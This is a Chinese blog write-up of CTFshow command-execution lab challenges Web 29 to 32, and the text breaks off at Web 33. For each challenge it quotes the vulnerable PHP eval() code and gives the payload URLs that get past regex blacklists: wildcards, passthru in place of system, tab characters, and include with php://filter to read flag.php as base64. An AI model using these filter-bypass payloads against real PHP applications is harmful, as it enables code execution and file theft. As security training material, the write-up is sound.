---

description: >-
這里就記錄一下ctfshow的刷題記錄是web入門的命令執(zhí)行專題里面的題目，他是有分類，并且覆蓋也很廣泛，所以就通過刷這個來，不過里面有一些腳本的題目發(fā)現我自己根本不會笑死。
如果還不怎么知道寫題的話，可以去看我的gitbook，當然csdn我也轉載了我自己的文章。如果你能去我的github為我的gitbook項目點亮星星或者follow me 那我將更開心。并且github和gitbook里面更詳細，有更多關于web安全方面的知識，觀感也會更好o。
github：https://github.com/kakaandhanhan/cybersecurity_knowledge_book-gitbook.22kaka.fun
gitbook：
http://gitbook.22kaka.fun

---

?? CTFSHOW命令執(zhí)行

（1）Web 29

1.代碼解釋

error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

這段代碼非常簡單，就是通過get獲得的變量c，如果里面不含有flag這個字符，就把c變量做為php代碼執(zhí)行。

2.解答過程

所以我們先查看當前目錄下的文件。

http://21631e8d-00f2-42ec-991a-0bc5b5d7d661.challenge.ctf.show/?c=system("ls");

執(zhí)行后，得到回顯

可以看到，當前目錄下有flag.php和index.php文件，很明顯，我們要查看flag.php的內容，但是我們的c變量不能含有flag這個詞，我們可以用通配符來處理這個問題，并且沒有過濾cat等，所以直接查看。

http://21631e8d-00f2-42ec-991a-0bc5b5d7d661.challenge.ctf.show/?c=system("cat f*");

然后我們發(fā)現我們頁面沒有顯示，可能是沒有php代碼，所以我們查看源碼，發(fā)現flag。

$flag = 'ctfshow{2d67c35d-5ae0-4429-88d3-53be43c7a618}';

---

（2）Web 30

error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

這段代碼和上一題代碼的區(qū)別就是，過濾了flag，system，和php。

既然我們system用不了了，我們看可以用其他的php執(zhí)行函數來代替嗎。

可以試試passthru

http://2f1af390-2e2d-4d53-b104-a31ed9917f2b.challenge.ctf.show/?c=passthru("ls");

可以發(fā)現是成功的，我們還是按照上面的步驟繼續(xù)執(zhí)行。得到flag。

http://2f1af390-2e2d-4d53-b104-a31ed9917f2b.challenge.ctf.show/?c=passthru("cat f*");

$flag = 'ctfshow{8fc40658-23ec-4363-92e2-93a9320f5d4e}';

---

（3）web 31

error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

可以看到過濾變多了，并且過濾了單引號和點和空格，單引號我們可以用雙引號代替，空格也有很多可以代替的，cat可以用more等來代替，我們之前用的函數passthru可以不變。

所以得到最后的過濾語句為

http://af3fbe54-a16b-4cfb-bae0-180dc1e8ba0b.challenge.ctf.show/?c=passthru("ls");

可以看到出現我們想要的結果了，說明這個思路對了。然后利用查看的php代碼。

http://af3fbe54-a16b-4cfb-bae0-180dc1e8ba0b.challenge.ctf.show/?c=echo(`less,f*`);

其實在這個地方的時候遇到了一個問題，就是如果我用<>或者%20或者$IFS都出不來，只有%09能出來結果，并且我用其他的過濾方式會導致生成新的文件，這是我沒想通的。

---

（4）web 32

error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

還是一樣的過濾，大部分的過濾方式，其實現在都講了，就是這個echo，我們可以換成print，但是我們用的一些函數都需要括號，所以之前的方法單純過濾肯定不頂用。

后面看到wp發(fā)現可以用include，包含一個參數，參數傳遞php協議去篩選出本地文件

這個方法因為之前沒有使用過。所以需要學習一下。

首先解釋一下

include "$_GET[X]"?>
include "$_POST[x]"?>

這兩個是一個php查詢參數的語句，其中的x就是查詢的參數名。又因為，include是要包含文件，所以x傳遞的應該是一個文件路徑。

以上語句的雙引號可以去掉，在某些單引號和雙引號被過濾的情況下。

上面的?>是為了結束php的代碼塊，明確告訴解析器，我們的php代碼結束了，我們接下來傳入的參數是php的代碼

---

---

有了以上的基礎后，我們得到的答案代碼片段是

http://e688fc70-5820-4a9b-96ae-5d688f4d2743.challenge.ctf.show/?c=include"$_GET[url]"?>&url=php://filter/read=convert.base64-encode/resource=flag.php

可以看到，我們將flag.php的內容轉化為base64編碼展示出來了。

PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7OTJkMTBlNjEtMTg1Zi00NTU4LTk4MGMtZWQ1Y2IyMjllNGQ3fSI7DQo=

然后進行base64解碼，發(fā)現是

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:49:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/$flag="ctfshow{92d10e61-185f-4558-980c-ed5cb229e4d7}";

---

（5）web 33

error_reporting(0);
if(isset(